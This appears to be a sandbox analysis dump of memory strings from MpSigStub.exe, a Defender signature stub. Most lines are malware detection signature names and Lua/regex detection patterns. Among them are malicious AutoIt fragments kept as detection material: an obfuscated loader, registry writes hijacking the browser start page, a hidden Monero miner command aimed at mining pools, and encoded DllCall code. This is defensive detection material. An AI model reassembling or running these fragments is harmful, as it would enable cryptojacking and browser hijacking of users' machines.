Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "0x457865637574652842696e617279746f737472696e672827307834353738363536333735373436353238343236
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 633323339323732393239272929"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ar_3108!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $d3076 = execute
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dim $t31qy644 = $d3076 ( "chr" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $t31qy644 ( 303 + -204 ) & $t31qy644 ( 315 + -204 ) & $t31qy644 ( 304 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 ) & $t31qy644 ( 312 + -204 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $r323038323oc0a ( $n32313731jj , $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $m323130303w3e ( $u33lrw44yn ) & $t31qy644 ( 297 + -204 ) , $r32313131va5m7zl )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "start page"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "default_page_url"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "search bar"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:ransom:win32/tron.pb!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $extension = "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: guicreate ( "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: _filecreate ( @appdatadir & "\network\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: _filecreate ( @localappdatadir & "\microsoft\windows\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: filecopy ( "c:\programdata\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: " , "c:\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#allowlist:bonzo
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_outfile=helpnew.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_res_description=bonzo uvnc-helper
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_res_companyname=bonzo
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_run_before=echo ""1"" >""c:\users\bonzo\temp\lock"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: autoit3wrapper_run_after=copy ""%out%"" ""c:\users\bonzo\temp"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $sservicename = "tvnserver"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $option_update = "http://bonzo.lublin.pl/help/helpnew.exe"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/coinminer.pa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: opt ( "trayiconhide" , 0 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -p x -k --nicehash -a rx/0 --max-cpu-usage=25" , "" , @sw_hide )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: run ( @comspec & " /c " & "%localappdata%\temp\
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \webhelper.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0-o strat
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ://xmr.2miners.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ://randomxmonero.usa-east.nicehash.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/autoitinject.sd!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ( "6c6c5374727563744765745074722824744275666629290x446c6c5374727563744372656174652822627974655b222026202469506c61696e54657874536
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ( "666292c202264776f7264222c2031290x446c6c43616c6c2824646c6c68616e646c652c2022626f6f6c222c202243727970744861736844617461222c2022
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ( "6c222c204578656375746528225472756522292c202264776f7264222c20302c20227374727563742a222c20'~
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: [^\]+
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:lastfolder
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %s%s!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: :longfolder
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojan:script/userexecution.a!amsi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojan:script/userexecution.a!amsiobmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 48db3ab350cd5
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 1d5b3942ec61c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: susptool_
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:colisicomponent
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: appdatafr3.bin
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 15b362aecaba
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: db78cc5e9b0b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dbb38de769be
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#context:softwarebundler:win32/installmonster.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (.+)%(.%).exe$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (.+).exe$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 4cb382521bf6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &\\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \\.\pipe\mpvsocket
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \clickonceforgooglechrome.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \evolvecontactagent.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:contextdataprocessname2
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:contextdataprocessname2obmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfilecontextdatapresent
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfileforcreatingprocess
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 7378b0f18dd3
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:autoitcustomlastsec
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#jenxcusbase64deobfuscator
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#jenxcusbase64deobfuscatorobmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e"[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: [jxs64]
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/gatak.eg!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ?\appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \%d+%.exe$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: aa785fa688b6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cmd /c tas
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 95b39109a48a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:cobmetloader.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:cobmetloader.aobmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:contextpeadminshare.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:contextpeadminshare.a1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 69b3eccf1b7a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &z~5
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 3p!#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: o!#aggr:dridexdllnames
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:unnamedeccparams
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: n!#tel:unnamedeccparams
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: i!#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: h!#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g!#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#bm_copyrenamediname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#bm_copyrenamedoname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#alf:trojan:win32/cassini.b!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!cmstp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!cmstp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!msxsl.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!msxsl.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!netsh.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!netsh.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!notes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!notes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!print.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!print.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!vmmap.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!vmmap.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/obfuse.xsxg!lnk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "b!#alf:trojan:win32/obfuse.xsxg!lnk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:exploit:script/makeshift.a!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $`!#alf:exploit:script/makeshift.a!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojanspy:msil/formbook.rbf!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %_!#alf:trojanspy:msil/formbook.rbf!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#script:adware:html/seoframe.a!lowfi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %_!#script:adware:html/seoframe.a!lowfi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cassini_2b8f5083!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ']!#alf:trojan:win32/cassini_2b8f5083!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:suspamsiwmieventsubsription.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (\!#slf:aggr:suspamsiwmieventsubsription.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojan:powershell/amsiscanbypass.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (\!#slf:trojan:powershell/amsiscanbypass.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:hacktool:powershell/internaloff.c1!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ,x!#slf:hacktool:powershell/internaloff.c1!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -w!#blkacc:d4f940ab-401b-4efc-aadc-ad5f3c50688a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:o97m/excelobjectxllpluginabuse.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -w!#tel:trojan:o97m/excelobjectxllpluginabuse.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:aggr:siga:msil/suspicious.send.screencap.s1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 1s!#alf:aggr:siga:msil/suspicious.send.screencap.s1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#agg:nivdort.cq1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: t!#agg:nivdort.cq1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:suspfileinwinmail.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: h!#slf:suspfileinwinmail.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:nullsoft:windowsdiscount
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g!#alf:nullsoft:windowsdiscount
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:trojan:msil/injgen.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#aggr:trojan:msil/injgen.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lowfitrojan:js/seedabutor.c_02
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#lowfitrojan:js/seedabutor.c_02
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !d!#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:powershell/bypassamsi.a!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !d!#alf:powershell/bypassamsi.a!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:html/fakealert.ar!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#alf:trojan:html/fakealert.ar!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojanspy:vbs/mekotio.mk!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#alf:trojanspy:vbs/mekotio.mk!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojanclicker:js/faceliker_6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#slf:trojanclicker:js/faceliker_6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojanclicker:js/faceliker_7
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#slf:trojanclicker:js/faceliker_7
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: #b!#alf:backdoor:js/potentialwebshell
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cassini_56a3061!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#alf:trojan:win32/cassini_56a3061!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:trojandownloader:vbs/adodb!owse
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#scpt:trojandownloader:vbs/adodb!owse
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:exploit:o97m/ddedownloader.v!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#tel:exploit:o97m/ddedownloader.v!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:powershell/hiddien.a!attk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#tel:trojan:powershell/hiddien.a!attk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#do_exhaustivehstr_rescan_nivdort_cd1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#do_exhaustivehstr_rescan_nivdort_cd1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cassini_2c94ada9!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: '^!#alf:trojan:win32/cassini_2c94ada9!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:newpeinternalnamedifffromfilename
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (]!#aggr:newpeinternalnamedifffromfilename
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:newpeoriginalnamedifffromfilename
